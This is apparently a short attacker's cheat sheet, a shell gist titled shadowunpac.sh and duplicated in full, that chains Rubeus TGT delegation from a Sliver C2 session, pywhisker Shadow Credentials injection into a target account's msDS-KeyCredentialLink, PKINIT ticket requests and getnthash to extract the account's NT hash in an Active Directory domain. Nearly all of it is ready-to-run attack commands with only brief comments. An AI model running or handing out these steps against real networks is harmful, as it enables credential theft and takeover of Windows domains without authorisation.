zimnyaa/shadowunpac.sh

## shadowunpac.sh
# getting the current ticket
sliver (SESSION) > rubeus tgtdeleg /nowrap
echo <ticket> | base64 --decode > ticket.kirbi
ticketConverter.py ticket.kirbi ticket.ccache

# adding ms-KeyCredentialLink
proxychains4 python3 pywhisker/pywhisker.py -k -d "domain" --target "dcagent" -u "dadmin" --action "add" --filename cert

# requesting a ticket with ShadowCredentials
proxychains4 python3 gettgtpkinit.py -cert-pfx ../cert.pfx -pfx-pass pass -dc-ip dc1.domain domain/dcagent dcagent.ccache

# UnPAC the ST
export KRB5CCNAME=dcagent.ccache
proxychains4 python3 getnthash.py -key <key> "domain/dcagent"
	# getting the current ticket
	sliver (SESSION) > rubeus tgtdeleg /nowrap
	echo <ticket> \| base64 --decode > ticket.kirbi
	ticketConverter.py ticket.kirbi ticket.ccache

	# adding ms-KeyCredentialLink
	proxychains4 python3 pywhisker/pywhisker.py -k -d "domain" --target "dcagent" -u "dadmin" --action "add" --filename cert

	# requesting a ticket with ShadowCredentials
	proxychains4 python3 gettgtpkinit.py -cert-pfx ../cert.pfx -pfx-pass pass -dc-ip dc1.domain domain/dcagent dcagent.ccache

	# UnPAC the ST
	export KRB5CCNAME=dcagent.ccache
	proxychains4 python3 getnthash.py -key <key> "domain/dcagent"